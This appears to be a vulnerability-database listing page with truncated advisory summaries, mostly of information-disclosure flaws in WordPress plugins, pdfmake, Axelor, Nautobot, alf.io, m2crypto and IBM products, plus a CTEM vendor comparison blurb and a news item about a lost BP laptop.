EUVD-2026-33248

The Breeze plugin for WordPress is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor in all versions up to, and including, 2.5.2 This is due to improper verification of the wordpressloggedin cookie in the inc/cache/execute-cache.php file when the "Cache Logged-in Users"...

Nucleus Security vs Hive Pro: CTEM Comparison

Choosing between Nucleus Security vs Hive Pro is really a decision about how your security team wants to run exposure management: as an aggregation and workflow layer over existing tools, or as a broader CTEM platform that combines aggregation, native discovery, threat intelligence, validation, a...

pdfmake 安全漏洞

pdfmake is a pure JavaScript server-side and client-side PDF document generation library developed by Bartek Pampuch. There were security vulnerabilities in the version 0.3.0-beta.2 to 0.3.5 of pdfmake, which stemmed from the src/URLResolver.js component’s server-side request forgery vulnerabilit...

CVE-2025-27899

IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 discloses sensitive information in an environment variable that could aid in further attacks against the system...

Edimax EW-7438RPn-v3 Mini 安全漏洞

The Edimax EW-7438RPn-v3 Mini is a mini wireless signal extender produced by Edimax of Taiwan, China. Version 1.27 of the Edimax EW-7438RPn-v3 Mini contains a security vulnerability. This vulnerability allows unverified attackers to access the /wizardreboot.asp page, potentially leading to the...

EUVD-2022-6802

Malicious code in bioql PyPI...

EUVD-2025-17753

Malicious code in bioql PyPI...

PT-2025-33747

Name of the Vulnerable Software and Affected Versions: EzGED3 versions prior to 3.5.72.27183 Description: EzGED3 is susceptible to an unauthenticated arbitrary file read issue stemming from inadequate access control and insufficient input validation within a web-accessible script. An attacker can...

CVE-2025-50341

A Boolean-based SQL injection vulnerability was discovered in Axelor 5.2.4 via the domain parameter. An attacker can manipulate the SQL query logic and determine true/false conditions, potentially leading to data exposure or further exploitation...

CVE-2025-49142

CVE-2025-49142 affects Nautobot prior to 2.4.10 and prior to 1.6.32. The issue arises from misconfigurations in the Jinja2 templating used in computed fields, custom links, etc., allowing a malicious user to expose secret values or to invoke Python APIs to modify data when templated content is re...

PT-2024-27523 · Undefined · Undefined

Name of the Vulnerable Software and Affected Versions: No specific software or versions are mentioned. Description: The issue concerns an IDOR vulnerability. There is no information provided about the estimated number of potentially affected devices worldwide or details about real-world incidents...

CVE-2024-25635 IDOR Vulnerability: Allowing Organization Owner to view the other Organizations API KEY and USERS

alf.io is an open source ticket reservation system. Prior to version 2.0-Mr-2402, organization owners can view the generated API KEY and USERS of other organization owners using the http://192.168.26.128:8080/admin/api/users/ endpoint, which exposes the details of the provided user ID. This may...

m2crypto Bleichenbacher timing attack - incomplete fix for CVE-2020-25657

A flaw was found in m2crypto. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data...

PT-2024-15017

Name of the Vulnerable Software and Affected Versions FastDup WordPress plugin versions prior to 2.2 Description The issue concerns the FastDup WordPress plugin, which does not prevent directory listing in sensitive directories containing export files. This could potentially expose sensitive...

CVE-2022-0594

The Professional Social Sharing Buttons, Icons & Related Posts WordPress plugin before 9.7.6 does not have proper authorisation check in one of the AJAX action, available to unauthenticated in v 9.7.5 and author+ in v9.7.5 users, allowing them to call it and retrieve various information such as t...

Information Disclosure Vulnerability in Jazz Foundation in Multiple IBM Products

IBM Rational Collaborative Lifecycle Management CLM, etc. are products of IBM Corporation in the U.S. IBM Rational CLM, Rational Team Concert RTC and Rational Engineering Lifecycle Rational CLM, Rational Team Concert RTC and Rational Engineering Lifecycle Manager RELM are all collaborative...

Lost BP Laptop Contains Financial Information on Thousands of Gulf Oil Spill Victims

Almost a year has passed since the Deepwater Horizon oil rig exploded and spewed three months of oil into the Gulf of Mexico. But less than six months after the beleaguered oil giant managed to cap that well, it is contending with a new spill of a different sort: the loss of personal information ...

ATA-186 Password Disclosure Vulnerability

...